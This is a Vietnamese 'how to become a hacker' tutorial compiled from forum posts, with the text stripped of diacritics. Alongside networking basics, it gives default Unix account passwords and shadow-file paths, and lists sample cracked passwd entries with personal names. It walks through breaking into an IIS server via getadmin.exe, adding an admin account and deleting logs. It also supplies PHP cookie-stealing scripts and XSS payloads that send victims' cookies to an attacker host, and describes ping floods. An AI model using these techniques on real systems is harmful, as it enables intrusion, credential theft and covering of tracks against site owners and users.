Tro Thanh Hacker JFKLRPWGBD 20130117032341 64820

Trn trng cm n ngi cung cp cho UDS cun sch ny.
Nhng hiu bit c bn nht tr thnh Hacker - Phn

1
Nhiu bn Newbie c hi ti Hack l nh th no ? Lm sao hack ? Nhng cc
bn qun mt mt iu l cc bn cn phI c kin thc mt cch tng qut ,
hiu cc thut ng m nhng ngi rnh v mng hay s dng . Ring ti th cha
tht gii bao nhiu nhng qua nghin cu ti cng tng hp c mt s kin
thc c bn , mun chia s cho tt c cc bn , nhm cng cc bn hc hi .
Ti s khng chu trch nhim nu cc bn dng n quy ph ngi khc . Cc bn c
th copy hoc post trong cc trang Web khc nhng hy in tin tc gi di bi , tn
trng bi vit ny cng chnh l tn trng ti v cng sc ca ti , ng thi cng tn
trng chnh bn thn cc bn . Trong ny ti cng c chn thm mt s cch hack , crack
v v d cn bn , cc bn c th ng dng th v nghin cu c n hiu thm , ri
khi bt gp mt t m cc bn khng hiu th hy c bi ny bit , trong ny ti c s
dng mt s ca bi vit m ti thy rt hay t trang Web ca HVA , v cc trang Web
khc m ti tng gh thm . Xin cm n nhng tc gi vit nhng bi y . By gi
l vn chnh .

1 . ) Ta cn nhng g bt u?

C th nhiu bn khng ng vi ti nhng cch tt nht thc tp l cc bn hy
dng HH Window 9X , rI n cc ci khc mnh hn l Linux hoc Unix , dI
y l nhng ci bn cn c :
+ Mt ci OS ( c th l DOS , Window 9X , Linux , Unit .)
+ Mt ci trang Web tt ( HVA chng hn hi`hi` greenbiggrin.gif greenbiggrin.gif )
+ Mt b trnh duyt mng tt ( l Nescape , IE , nhng tt nht c l l Gozzila )
+ Mt cng c chat tt ( mIRC ,Yahoo Mass ..)
+ Telnet ( hoc nhng ci tng t nh nmap )
+ Ci quan trng nht m bt c ai mun tr thnh mt hacker l u phI c mt cht
kin thc v lp trnh ( C , C++ , Visual Basic , Pert ..)

2 . ) Th no l mt a ch IP ?

_ a ch IP c chia thnh 4 s gii hn t 0 - 255. Mi s c lu bi 1 byte - > !P
c kicks thc l 4byte, c chia thnh cc lp a ch. C 3 lp l A, B, v C. Nu
lp A, ta s c th c 16 triu i ch, lp B c 65536 a ch. V d: lp B vi
132.25,chng ta c tt c cc a ch t 132.25.0.0 n 132.25.255.255. Phn ln cc a
ch lp A ll s hu ca cc cng ty hay ca t chc. Mt ISP thng s hu mt vi
a ch lp B hoc C. V d: Nu a ch IP ca bn l 132.25.23.24 th bn c th xc
nh ISP ca bn l ai. ( c IP l 132.25.x.)
_ IP l t vit tt ca Internet Protocol, trn Internet th a ch IP ca mI ngi l duy
nht v n s I din cho chnh ngI , a ch IP c s dng bi cc my tnh khc
nhau nhn bit cc my tnh kt ni gia chng. y l l do ti sao bn li b IRC
cm, v l cch ngi ta tm ra IP ca bn.
a ch IP c th d dng pht hin ra, ngi ta c th ly c qua cc cch sau :
+ bn lt qua mt trang web, IP ca bn b ghi li
+ trn IRC, bt k ai cng c th c IP ca bn
+ trn ICQ, mi ngi c th bit IP ca bn, thm ch bn chn ``do not show ip`` ngi
ta vn ly c n
+ nu bn kt ni vi mt ai , h c th g ``systat n ``, v bit c ai ang kt ni
n h
+ nu ai gi cho bn mt email vi mt on m java tm IP, h cng c th tm
c IP ca bn
( Ti liu ca HVA )

3 . ) Lm th no bit c a ch IP ca mnh ?

Run nh lnh winipcfg ._ Trong Window : vo Start
_ Trong mIRC : kt nI n my ch sau nh lnh /dns
_ Thng qua mt s trang Web c hin th IP .

4 . ) IP Spoofing l g ?

_ Mt s IP c mc ch xc nh mt thit b duy nht trn th gii. V vy trn mng
mt my ch c th cho php mt thit b khc trao i d liu qua li m khng cn
kim tra my ch.
Tuy nhin c th thay i IP ca bn, ngha l bn c th gi mt thng tin gi n mt
my khc m my s tin rng thng tin nhn c xut pht t mt my no (tt
nhin l khng phi my ca bn). Bn c th vt qua my ch m khng cn phi c
quyn iu khin my ch . iu tr ngi l ch nhng thng tin phn hi t my
ch s c gi n thit b c IP m chng ta gi mo. V vy c th bn s khng c
c s phn hi nhng thng tin m mnh mong mun. C l iu duy nht m spoof IP
c hiu qu l khi bn cn vt qua firewall, trm account v cn du thng tin c nhn!
( Ti liu ca HVA )

5 . ) Trojan / worm / virus / logicbomb l ci g ?

_ Trojan : Ni cho d hiu th y l chng trnh ip vin c ci vo my ca ngI
khc n cp nhng ti liu trn my gI v cho ch nhn ca n , Ci m n n cp
c th l mt khu , accourt , hay cookie . tu theo mun ca ngI ci n .
_ virus : Ni cho d hiu th y l chng trnh vI nhng m c bit c ci ( hoc
ly lan t my khc ) ln my ca nn nhn v thc hin nhng yu cu ca m , a s
virut c s dng ph hoI d liu hoc ph hoI my tnh .
_ worm : y l chng trnh c lp c th t nhn bn bn thn n v ly lan khp bn
trong mng .Cng ging nh Virut , n cng c th ph hoI d liu , hoc n c th ph
hoI bn trong mng , nhiu khi cn lm down c mang .
_ logicbomb : L chng trnh gi mt lc nhiu gi d liu cho cng mt a ch , lm
ngp lt h thng , tt nghn ng truyn ( trn server ) hoc dng lm cng c
khng b I phng ( bom Mail ) ;) .

6 . ) PGP l g ?

_ PGP l vit tt ca t Pretty Good Privacy , y l cng c s dng s m ho cha
kho cng cng bo v nhng h s Email v d liu , l dng m ho an ton cao s
dng phn mm cho MS_DOS , Unix , VAX/VMS v cho nhng dng khc .

7 . ) Proxy l g ?

_Proxy cung cp cho ngi s dng truy xut internet vi nhng host n. Nhng proxy
server phc v nhng nghi thc t bit hoc mt tp nhng nghi thc thc thi trn
dual_homed host hoc basion host. Nhng chng trnh client ca ngi s dung s qua
trung gian proxy server thay th cho server tht s m ngi s dng cn giao tip. Proxy
server xc nh nhng yu cu t client v quyt nh p ng hay khng p ng, nu
yu cu c p ng, proxy server s kt ni vi server tht thay cho client v tip tc
chuyn tip n nhng yu cu t clientn server, cng nh p ng nhng yu cu ca
server n client. V vy proxy server ging cu ni trung gian gia server v client .
_ Proxy cho user truy xut dch v trn internet theo ngha trc tip. Vi dual host homed
cn phi login vo host trc khi s dng dch v no trn internet. iu ny thng
khng tin li, v mt s ngi tr nn tht vng khi h c cm gic thng qua firewall,
vi proxy n gii quyt c vn ny. Tt nhin n cn c nhng giao thc mi
nhng ni chung n cng kh tin li cho user. Bi v proxy cho php user truy xut
nhng dch v trn internet t h thng c nhn ca h, v vy n khng cho php packet
i trc tip gia h thng s dng v internet. ng i l ging tip thng qua dual
homed host hoc thng qua s kt hp gia bastion host v screening rounter.

( Bi vit ca Z3RON3 ti liu ca HVA )

8 . ) Unix l g ?

_ Unix l mt h iu hnh ( ging Window ) .N hin l h iu hnh mnh nht , v
thn thit vi cc Hacker nht . Nu bn tr thnh mt hacker tht s th HH ny
khng th thiu i vI bn . N c s dng h tr cho lp trnh ngn ng C .

9 . ) Telnet l g ?

_ Telnet l mt chng trnh cho php ta kt nI n my khc thng qua cng ( port ) .
MI my tnh hoc my ch ( server ) u c cng , sau y l mt s cng thng dng :
+ Port 21: FTP
+ Port 23: Telnet
+ Port 25: SMTP (Mail)
+ Port 37: Time
+ Port 43: Whois
_ V d : bn c th gI Telnet kt nI n mail.virgin.net trn port 25 .

10 . ) Lm th no bit mnh Telnet n h thng Unix ?
_ Ok , ti s ni cho bn bit lm sao mt h thng Unix c th cho hI bn khi bn kt
ni ti n . u tin , khi bn gi Unix , thng thng n s xut hin mt du nhc :
Log in : , ( tuy nhin , ch vi nh vy th cng cha chc chn y l Unix c ngoI
tr chng xut hin thng bo trc ch log in : nh v d : Welcome to SHUnix.
Please log in .)
By gi ta ang tI du nhc log in , bn cn phI nhp vo mt account hp l . Mt
account thng thng gm c 8 c tnh hoc hn , sau khi bn nhp account vo , bn s
thy c mt mt khu , bn hy th nhp Default Password th theo bng sau :

Account-------------------------Default Password

Root----------------------------------------------- Root
Sys------------------------------------------------ Sys / System / Bin
Bin------------------------------------------------ -Sys / Bin
Mountfsy------------------------------------------M ountfsys
Nuuc----------------------------------------------- Anon
Anon----------------------------------------------- Anon
User----------------------------------------------- -User
Games---------------------------------------------G ames
Install-------------------------------------------- --Install
Demo----------------------------------------------- Demo
Guest---------------------------------------------- Guest

11 . ) shell account l ci g ?

_ Mt shell account cho php bn s dng my tnh nh bn nh thit b u cuI (
terminal ) m vI n bn c th nh lnh n mt my tnh ang chy Unix , Shell l
chng trnh c nhim v dch nhng k t ca bn gi n rI a vo thc hin lnh
ca chng trnh Unix . VI mt shell account chnh xc bn c th s dng c mt
trm lm vic mnh hn nhiu so vI ci m bn c th tng tng n c .
Bn c th ly c shell account min ph tI trang Web http://www.freeshell.com/
tuy nhin bn s khng s dng c telnet cho n khi bn tr tin cho n .

12 . ) Lm cch no bn c th crack Unix account passwords ?

_ Rt n gin , tuy nhin cch m ti ni vI cc bn y lc hu rI , cc bn c th
crack c chng nu cc bn may mn , cn khng th cc bn c tham kho .
_ u tin bn hy ng nhp vo h thng c s dng Unix nh mt khch hng hoc
mt ngI khch gh thm , nu may mn bn s ly c mt khu c ct du trong
nhng h thng chun nh :

/etc/passwd

mi hng trong mt h s passwd c mt ti khon khc nhau , n ging nh hng ny :

userid:password:userid#:groupid#:GECOS field:home dir:shell

trong :
+ userid = the user id name : tn ng nhp : c th l mt tn hoc mt s .
+ password : mt m . Dng lm g hn cc bn cng bit rI .
+ userid# : l mt s duy nht c thng bo cho ngI ng k khi h ng k mI
ln u tin .
+ groupid# : tng t nh userid# , nhng n c dng cho nhng ngI ang trong
nhm no ( nh nhm Hunter Buq ca HVA chng hn )
+ GECOS FIELD : y l ni cha thng tin cho ngI s dng , trong c h tn y
, s in thoi , a ch v.v. . y cng l ngun tt ta d dng crack mt mt
khu .
+ home dir : l th mc ghi lI hot ng ca ngi khch khi h gh thm ( ging nh
mc History trong IE vy )
+ Shell : y l tn ca shell m n t ng bt u khi ta login .
_ Hy ly file password , ly file text m ho v , sau bn dng chng trnh
``CrackerJack`` hoc ``John the Ripper`` crack .
_ Cc bn thy cng kh d phI khng ? Sai bt , khng d dng v may mn bn c
th crack c v hu ht by gi h ct rt k , hy c tip bn s thy kh khn ch
no .

13 . ) shadowed password l ci g ?

_ Mt shadowed password c bit n l trong file Unix passwd , khi bn nhp mt
mt khu , th ngI khc ch thy c trnh n ca n ( nh k hiu X hoc * )
. Ci ny thng bo cho bn bit l file passwd c ct gi ni khc , ni m mt
ngI s dng bnh thng khng th n c . Khng l ta nh b tay , d nhin l
I vI mt hacker th khng ri , ta khng n c trc tip file shadowed password
th ta hy tm file sao lu ca n , l file Unshadowed .
Nhng file ny trn h thng ca Unix khng c nh , bn hy th vI ln lt nhng
ng dn sau :

CODE
AIX 3 /etc/security/passwd !
or /tcb/auth/files/ /
A/UX 3.0s /tcb/files/auth/?/ *
BSD4.3-Reno /etc/master.passwd *
ConvexOS 10 /etc/shadpw *
ConvexOS 11 /etc/shadow *
DG/UX /etc/tcb/aa/user/ *
EP/IX /etc/shadow x
HP-UX /.secure/etc/passwd *
IRIX 5 /etc/shadow x
Linux 1.1 /etc/shadow *
OSF/1 /etc/passwd[.dir|.pag] *
SCO Unix #.2.x /tcb/auth/files/ /
SunOS4.1+c2 /etc/security/passwd.adjunct =##username
SunOS 5.0 /etc/shadow
maps/tables/whatever >
System V Release 4.0 /etc/shadow x
System V Release 4.2 /etc/security/* database
Ultrix 4 /etc/auth[.dir|.pag] *
UNICOS /etc/udb =20

Trc du / u tin ca mt hng l tn ca h thng tng ng , hy cn c vo h
thng tht s bn mun ly rI ln theo ng dn pha sau du /u tin .
V cuI cng l nhng account passwd m ti tng crack c , c th by gi n ht
hiu lc rI :

CODE
arif:x:1569:1000:Nguyen Anh Chau:/udd/arif:/bin/ksh
arigo:x:1570:1000:Ryan Randolph:/udd/arigo:/bin/ksh
aristo:x:1573:1000:To Minh Phuong:/udd/aristo:/bin/ksh
armando:x:1577:1000:Armando Huis:/udd/armando:/bin/ksh
arn:x:1582:1000:Arn mett:/udd/arn:/bin/ksh
arne:x:1583:1000:Pham Quoc Tuan:/udd/arne:/bin/ksh
aroon:x:1585:1000:Aroon Thakral:/udd/aroon:/bin/ksh
arozine:x:1586:1000: Mogielnicki:/udd/arozine:/bin/bash
arranw:x:1588:1000:Arran Whitaker:/udd/arranw:/bin/ksh

bo m s b mt nn pass ca h ti xo i v vo l k hiu x , cc bn
hy tm hiu thng tin c c t chng xem

Ht phn 1
Tc gi : Anhdenday - HVAonline
2 [10/11/2004 3:11:00 PM]

Vitual port ( cng o ) l 1 s t nhin c gi trong TCP(Tranmission Control
Protocol) v UDP(User Diagram Protocol) header. Nh mi ngui bit, Windows
c th chy nhiu chng trnh 1 lc, mi chng trnh ny c 1 cng ring dng
truyn v nhn d liu.
V d 1 my c a ch IP l 127.0.0.1 chy WebServer, FTP_Server, POP3 server, etc,
nhng dch v ny u uc chy trn 1 IP address l 127.0.0.1, khi mt gi tin uc gi
n lm th no my tnh ca chng ta phn bit c gi tin ny i vo dch v no
WebServer hay FTP server hay SM! TP? Chnh v th Port xut hin. Mi dch v c 1 s
port mc nh, v d FTP c port mc nh l 21, web service c port mc nh l 80,
POP3 l 110, SMTP l 25 vn vn....

Ngi qun tr mng c th thay i s port mc nh ny, nu bn ko bit s port trn
mt my ch, bn ko th kt ni vo dch v c. Chc bn tng nghe ni n
PORT MAPPING nhng c l cha bit n l g v chc nng th no. Port mapping
thc ra n gin ch l qu trnh chuyn i s port mc nh ca mt dch v no n
1 s khc. V d Port mc nh ca WebServer l 80, nhng thnh thong c l bn vn
thy http://www.xxx.com:8080/ , 8080 y chnh l s port ca host xxx nhng uc
ngui qun tr ca host ny ``map`` t 80 thnh 8080.

( Ti liu ca HVA )

15 . ) DNS l g ?

_ DNS l vit tt ca Domain Name System. Mt my ch DNS i kt ni cng s 53,
c ngha l nu bn mun kt ni vo my ch , bn phi kt ni n cng s 53. My
ch chy DNS chuyn hostname bng cc ch ci thnh cc ch s tng ng v ngc
li. V d: 127.0.0.1 -- > localhost v localhost--- > 127.0.0.1 .

( Ti liu ca HVA )

16 . ) i iu v Wingate :

_ WinGate l mt chng trnh n gin cho php bn chia cc kt ni ra. Th d: bn c
th chia s 1 modem vi 2 hoc nhiu my . WinGate dng vi nhiu proxy khc nhau c
th che giu bn .
_ Lm sao Wingate c th che du bn ? Hy lm theo ti : Bn hy telnet trn cng
23 trn my ch chy WinGate telnet proxy v bn s c du nhc WinGate > . Ti du
nhc ny bn nh vo tn server, cng mt khong trng v cng bn mun kt ni vo.
VD :

CODE
telnet wingate.net
WinGate > victim.com 23

ta telnet n cng 23 v y l cng mc nh khi bn ci Wingate . lc ny IP trn my
m victim chp c ca ta l IP ca my ch cha Wingate proxy .
_ Lm sao tm Wingate ?
+ Nu bn mun tm IP WinGates tnh (IP khng i) th n yahoo hay mt trang tm
kim cable modem. Tm kim cable modems v nhiu ngi dng cable modems c
WinGate h c th chia s ng truyn rng ca n cable modems cho nhng my
khc trong cng mt nh . Hoc bn c th dng Port hay Domain scanners v scan Port
1080 .
+ tm IP ng (IP thay i mi ln user kt ni vo internet) ca WinGates bn c th
dng Domscan hoc cc chng trnh qut khc . Nu dng Domscan bn hy nhp
khong IP bt k vo box u tin v s 23 vo box th 2 . Khi c kt qu , bn hy
th ln lt telnet n cc a ch IP tm c ( hng dn trn ), nu n xut hin
du Wingate > th bn tm ng my ang s dng Wingate rI .
+ Theo kinh nghim ca ti th bn hy down wingatescanner v m si , n c rt nhiu
trn mng .

17 . ) i iu v Traceroute :

_ Traceroute l mt chng trnh cho php bn xc nh c ng i ca cc gi
packets t my bn n h thng ch trn mng Internet.
_ bn hy xem VD sau :

CODE
C:\windows > tracert 203.94.12.54

Tracing route to 203.94.12.54 over a maximum of 30 hops

1 abc.netzero.com (232.61.41.251) 2 ms 1 ms 1 ms
2 xyz.Netzero.com (232.61.41.0) 5 ms 5 ms 5 ms
3 232.61.41.10 (232.61.41.251) 9 ms 11 ms 13 ms
4 we21.spectranet.com (196.01.83.12) 535 ms 549 ms 513 ms
5 isp.net.ny (196.23.0.0) 562 ms 596 ms 600 ms
6 196.23.0.25 (196.23.0.25) 1195 ms1204 ms
7 backbone.isp.ny (198.87.12.11) 1208 ms1216 ms1233 ms
8 asianet.com (202.12.32.10) 1210 ms1239 ms1211 ms
9 south.asinet.com (202.10.10.10) 1069 ms1087 ms1122 ms
10 backbone.vsnl.net.in (203.98.46.01) 1064 ms1109 ms1061 ms
11 newdelhi-01.backbone.vsnl.net.in (203.102.46.01) 1185 ms1146 ms1203 ms
12 newdelhi-00.backbone.vsnl.net.in (203.102.46.02) ms1159 ms1073 ms
13 mtnl.net.in (203.194.56.00) 1052 ms 642 ms 658 ms

Ti cn bit ng i t my ti n mt host trn mng Internet c a ch ip l
203.94.12.54. Ti cn phi tracert n n! Nh bn thy trn, cc gi packets t my
ti mun n c 203.94.12.54 phi i qua 13 hops(mc xch) trn mng. y l ng
i ca cc gi packets .
_ Bn hy xem VD tip theo :

CODE
host2 # traceroute xyz.com

traceroute to xyz.com (202.xx.12.34), 30 hops max, 40 byte packets
1 isp.net (202.xy.34.12) 20ms 10ms 10ms
2 xyz.com (202.xx.12.34) 130ms 130ms 130ms

+ Dng u tin cho bit hostname v a ch IP ca h thng ch. Dng ny cn cho
chng ta bit thm gi tr TTL<=30 v kch thc ca datagram l 40 bytes(20-bytes IP
Header + 8-bytes UDP Header + 12-bytes user data).
+ Dng th 2 cho bit router u tin nhn c datagram l 202.xy.34.12, gi tr ca
TTL khi gi n router ny l 1. Router ny s gi tr li cho chng trnh traceroute
mt ICMP message error ``Time Exceeded``. Traceroute s gi tip mt datagram n h
thng ch.
+ Dng th 3, xyz.com(202.xx.12.34) nhn c datagram c TTL=1(router th nht
gim mt trc - TTL=2-1=1). Tuy nhin, xyz.com khng phi l mt router, n s
gi tr li cho traceroute mt ICMP error message ``Port Unreachable``. Khi nhn c
ICMP message ny, traceroute s bit c n c h thng ch xyz.com v kt
thc nhim v ti y.
+ Trong trng hp router khng tr li sau 5 giy, traceroute s in ra mt du sao
``*``(khng bit) v tip tc gi datagram khc n host ch!
_Ch :
Trong windows: tracert hostname
Trong unix: traceroute hostname

( Ti liu ca viethacker.net )

18 . ) Ping v cch s dng :

_ Ping l 1 khi nim rt n gin tuy nhin rt hu ch cho vic chn on mng. Tiu
s ca t ``ping`` nh sau: Ping l ting ng vang ra khi 1 tu ngm mun bit c 1 vt
th khc gn mnh hay ko, nu c 1 vt th no gn tu ngm ting sng m ny s
va vo vt th v ting vang li s l ``pong`` vy th tu ngm s bit l c g gn
mnh.
_Trn Internet, khi nim Ping cng rt ging vi tiu s ca n nh cp trn.
Lnh Ping gi mt gi ICMP (Internet Control Message Protocol) n host, nu host
``pong`` li c ngha l host tn ti (hoc l c th vi ti oc). Ping cng c th gip
chng ta bit c lung thi gian mt gi tin (data packet) i t my tnh ca mnh n
1 host no .
_Ping tht d dng, ch cn m MS-DOS, v g ``ping a_ch_ip``, mc nh s ping 4
ln, nhng bn cng c th g

CODE
``ping ip.address -t``

Cch ny s lm my ping mi. thay i kch thc ping lm nh sau:

CODE
``ping -l (size) a_ch_ip ``

Ci ping lm l gi mt gi tin n mt my tnh, sau xem xem mt bao lu gi tin ri
xem xem sau bao lu gi tin quay tr li, cch ny xc nh c tc ca kt ni,
v thi gian cn mt gi tin i v quay tr li v chia bn (gi l ``trip time``). Ping
cng c th c dng lm chm i hoc v h thng bng lt ping. Windows 98
treo sau mt pht lt ping (B m ca kt ni b trn c qua nhiu kt ni, nn
Windows quyt nh cho n i ngh mt cht). Mt cuc tn cng ping flood s chim
rt nhiu bng thng ca bn, v bn phi c bng thng ln hn i phng ( tr khi i
phng l mt my chy Windows 98 v bn c mt modem trung bnh, bng cch
bn s h gc i phng sau xp x mt pht lt ping). Lt Ping khng hiu qu lm i
vi nhng i phng mnh hn mt cht. tr khi bn c nhiu ng v bn kim sot
mt s lng tng i cc my ch cng ping m tng bng thng ln hn i phng.
Ch : option t ca DOS khng gy ra lt ping, n ch ping mc tiu mt cch lin tc,
vi nhng khong ngt qung gia hai ln ping lin tip. Trong tt c cc h Unix hoc
Linux, bn c th dng ping -f gy ra lt thc s. Thc t l phi ping -f nu bn dng
mt bn tng thch POSIX (POSIX - Portable Operating System Interface da trn
uniX), nu khng n s khng phi l mt bn Unix/Linux thc s, bi vy nu bn dng
mt h iu hnh m n t cho n l Unix hay Linux, n s c tham s -f.

( Ti liu ca HVA v viethacker.net )

19 . ) K thut xm nhp Window NT t mng Internet :

_ y l bi hc hack u tin m ti thc hnh khi bt u nghin cu v hack , by gi
ti s by li cho cc bn . bn s cn phI c mt s thI gian thc hin c n v n
tuy d nhng kh . Ta s bt u :
_ u tin bn cn tm mt server chy IIS :
_ Tip n bn vo DOS v nh ` FTP `. VD :

c:\Ftp http://www.dodgyinc.com/

( trang na khi ti thc hnh th vn cn lm c , by gi khng bit h fix cha ,
nu bn no c trang no khc th hy post ln cho mI ngI cng lm nh )
Nu connect thnh cng , bn s thy mt s dng tng t nh th ny :

CODE
Connected to http://www.dodgyinc.com./
220 Vdodgy Microsoft FTP Service (Version 3.0).
User (www.dodgyinc.com:(none)):

Ci m ta thy trn c cha nhng thng tin rt quan trng , n cho ta bit tn Netbios
ca my tnh l Vdodgy . T iu ny bn c th suy din ra tn m c s dng cho
NT cho php ta c th khai thc , mc nh m dch v FTP gn cho n nu n cha
i tn s l IUSR_VDODGY . Hy nh ly v n s c ch cho ta . Nhp
`ànonymous trong user n s xut hin dng sau :

CODE
331 Anonymous access allowed, send identity (e-mail name) as password.
Password:

By gi passwd s l bt c g m ta cha bit , tuy nhin , bn hy th nh vo passwd
l anonymous . Nu n sai , bn hy log in lI thit b FTP , bn hy nh l khi ta quay
lI ln ny th khng s dng cch mo danh na ( anonymous ) m s dng `Guest ,
th li passwd vi guest xem th no .
By gi bn hy nh lnh trong DOS :

CODE
Cd /c

V s nhn thy kt qu nu nh bn xm nhp thnh cng , by gi bn hy nhanh
chng tm th mc `cgi-bin` . Nu nh bn may mn , bn s tm c d dng v thng
thng h thng qun l t `cgi-bin` vo ni m ta va xm nhp cho cc ngI
qun l h d dng iu khin mng hn . th mc cgi-bin c th cha cc chng trnh
m bn c th li dng n chy t trnh duyt Web ca bn . Ta hy bt u quy
no greenbiggrin.gif greenbiggrin.gif .
_ u tin , bn hy chuyn t th mc cgi-bin v s dng lnh Binary ( c th cc bn
khng cn dng lnh ny ) , sau bn dnh tip lnh put cmd.exe . Tip theo l bn
cn c file hack ci vo th mc ny , hy tm trn mng ly 2 file quan trng nht
l `getadmin.exe` v `gasys.dll` . Download chng xung , mt khi bn c n hy
ci vo trong th mc cgi-bin . Ok , coi nh mI vic xong , bn hy ng ca s
DOS .
By gi bn hy nh a ch sau ln trnh duyt ca bn :

http://www.dodgyinc.com/cgi-bin/getadmin.exe? IUSR_VDODGY

Sau vi giy bn s c c cu tr li nh dI y :

CODE
CGI Error
The specified CGI application misbehaved by not returning a complete set of HTTP
headers. The headers it did return are:
Congratulations , now account IUSR_VDODGY have administrator rights!

Th l bn mo danh admin xm nhp h thng , vic cn thit by gi l bn hy
t to cho mnh mt account , hy nh dng sau trn IE :

http://www.dodgyinc.com/cgi- bin/cmd.exe?/c%20c:\winnt\system32\net.exe%20user%2
0hacker%20toilahacker%20/add

dng lnh trn s to cho bn mt account login vi user : anhdenday v passwd :
toilahackerBy gi bn hy l cho user ny c account ca admin , bn ch cn nh ln
IE lnh :

http://www.dodgyinc.com/cgi-bin/getadmin.exe? anhdenday

Vy l xong ri , bn hy disconnect v n start menu - > find ri search computer
`www.dodgyinc.com`. Khi tm thy , bn vo explore , explore NT s m ra bn hay
nhp user v passwd m n ( ca ti l user : anhdenday v passwd : toilahacker ) .

C mt vn l khi bn xm nhp h thng ny th s b ghi li , do xo du vt
bn hy vo `Winnt\system32\logfiles` m file log rI xo nhng thng tin lin quan
n bn , rI save chng . Nu bn mun ly mt thng bo g v vic chia s s xm
nhp th bn hy thay i ngy thng trn my tnh vI URL sau :

http://www.dodgyinc.com/cgi-bin/cmd.exe?/c%20 date%2030/04/03

xong rI bn hy xo file `getadmin.exe`, v `gasys.dll` t `cgi-bin` . Mc ch khi ta
xm nhp h thng ny l chm pass ca admin ln sau xm nhp mt cch hp l ,
do bn hy tm file SAM ( cha pass ca admin v member ) trong h thng rI dng
chng trnh l0pht crack crack pass ( Hng dn v cch s dng l0pht crack v
3.02 ti post ln ri ,cc bn hy t nghin cu nh ) . y l link :
http://vnhacker.org/forum/?act=ST&f=6&t=11566 &s=
Khi crack xong cc bn c user v pass ca admin rI , by gi hy xo account ca
user ( ca ti l anhdenday ) i cho an ton . Bn c th lm g trong h thng l tu
thch , nhng cc bn ng xo ht ti liu ca h nh , ti cho h lm .
Bn cm thy th no , rc ri lm phi khng . Lc ti th hack cch ny , ti my
m mt c 4 gi , nu nh bn quen th ln th 2 bn s mt t thI gian hn .

phn 3 ti s cp n HH Linux , n cch ngt mt khu bo v ca mt Web site
, v lm th no hack mt trang web n gin nht .v.v

Ht phn 2

Tc gi: Anhdenday - HVAOnline.net
3 [12/7/2004 10:33:00 AM]

20.) Cookie l g ?

Cookie l nhng phn d liu nh c cu trc c chia s gia web site v browser
ca ngi dng. cookies c lu tr di nhng file d liu nh dng text (size
di 4k). Chng c cc site to ra lu tr/truy tm/nhn bit cc thng tin v
ngi dng gh thm site v nhng vng m h i qua trong site.
Nhng thng tin ny c th bao gm tn/nh danh ngi dng, mt khu, s thch, thi
quen...Cookie c browser ca ngi dng chp nhn lu trn a cng ca my mnh,
ko phi browser no cng h tr cookie. Sau mt ln truy cp vo site, nhng thng tin
v ngi dng c lu tr trong cookie. nhng ln truy cp sau n site , web site
c th dng li nhng thng tin trong cookie (nh thng tin lin quan n vic ng nhp
vo 1 forum...) m ngi ko phi lm li thao tc ng nhp hay phi nhp li cc thng
tin khc. Vn t ra l c nhiu site qun l vic dng li cc thng tin lu trong
cookie ko chnh xc, kim tra ko y hoc m ho cc thng tin trong cookie cn s
h gip cho hacker khai thc vt qua cnh ca ng nhp, ot quyn iu khin site
.

_ Cookies thng c cc thnh phn sau :

+ Tn: do ngi lp trnh web site chn
+ Domain: l tn min t server m cookie c to v gi i
+ ng dn: thng tin v ng dn web site m bn ang xem
+ Ngy ht hn: l thi im m cookie ht hiu lc .
+ Bo mt: Nu gi tr ny c thit lp bn trong cookie, thng tin s c m ho
trong qu trnh truyn gia server v browser.
+ Cc gi tr khc: l nhng d liu c trng c web server lu tr nhn dng v
sau cc gi tr ny ko cha cc khong trng, du chm, phy v b gii hn trong khong
4k.

( Ti liu ca Viethacker.net )

21 . ) K thut ly cp cookie ca nn nhn :

_ Trc ht , cc bn hy m notepad ri chp on m sau vo notepad :

CODE
<?php
define (``LINE``, ``\r\n``);
define (``HTML_LINE``, ``
``);
function getvars($arr, $title)
{
$res = ````;
$len = count($arr);
if ($len > 0)
{
if (strlen($title) > 0)
{
print(``[--------$title--------]`` . HTML_LINE);
$res .= ``[--------$title--------]`` . LINE;
}
foreach ($arr as $key = > $value)
{
print(``[$key]`` . HTML_LINE);
print($arr[$key] . HTML_LINE);
$res .= ``[$key]`` . LINE . $arr[$key] . LINE;
}
}
return $res;
}
// get current date
$now = date(``Y-m-d H:i:s``);
// init
$myData = ``[-----$now-----]`` . LINE;
// get
$myData .= getvars($HTTP_GET_VARS, ````);
// file
$file = $REMOTE_ADDR . ``.txt``;
$mode = ``r+``;
if (!file_exists($file))
$mode = ``w+``;
$fp = fopen ($file, $mode);
fseek($fp, 0, SEEK_END);
fwrite($fp, $myData);
fclose($fp);
? >

hoc

CODE
<?php
if ($contents && $header){
mail(``victim@yahoo.com`` , ``from mail script``,$contents,$header) or
die(`couldnt email it`);
sleep(2);
? >
<script language=javascript >

<?php
} else {
echo ``nope``;
}

(Bn hy sa ci victim@yahoo.com thnh a ch Mail ca bn ) .

Bn hy save ci notepad ny vi tn < tn tu cc bn > .php ( Nh l phi c .php )
ri upload ln mt host no c h tr PHP , trong VD ca ti l abc.php .( i vi cc
bn tng lm Web chc s rt d phI khng ? ) . on m ny s c nhim v n cp
thng tin (v c khi c c cookie ) ca nn nhn khi h m d liu c cha on m ny
rI t ng save thng tin thnh file < ip ca nn nhn > .txt .
_ Cn mt cch na ly cookie c s dng trn cc forum b li nhng cha fix ,
khi post bi bn chi cn thm on m sau vo bi ca mnh :

CODE
document.write(` `)

vi host_php : l a ch bn upload file n cp cookie ln .
v abc.php l file VD ca ti .
_ V d : khi p dng trong tag img, ta dng nh sau:

CODE
`)\">

hoc:

[CODE
img]javascript: Document.write(`&#x3cimg
src=http://host_php/docs.php?docs=`+escape(document .cookie)+`&#x3e`)\">

_ Bn c th tm nhng trang web thc hnh th cch trong VD ny bng cch vo
google.com tm nhng forum b li ny bng t kho ``Powered by .. forum vi
nhng forum sau : ikonboard, Ultimate Bulletin Board , vBulletin Board, Snitz . Nu cc
bn may mn cc bn c th tm thy nhng forum cha fix li ny m thc hnh , ai tm
c th chia s vi mi ngi nh .
_ Cn nhiu on m n cp cookie cng hay lm , cc bn hy t mnh tm thm .

22 . ) Cch ngt mt khu bo v Website :

_ Khi cc bn ti tm kim thng tin trn mt trang Web no , c mt s ch trn trang
Web khi bn vo s b chn li v s xut hin mt box yu cu nhp mt khu , y
chnh l khu vc ring t ct du nhng thng tin mt ch dnh cho s ngi hoc mt
nhm ngi no ( Ni ct ngh hack ca viethacker.net m bo e-chip ni ti
chng hn ) . Khi ta click vo ci link th ( thng thng ) n s gi ti .htpasswd v
.htaccess nm cng trong th mc bo v trang Web . Ti sao phi dng du chm
trc trong tn file `.htaccess`? Cc file c tn bt u l mt du chm `.` s c cc
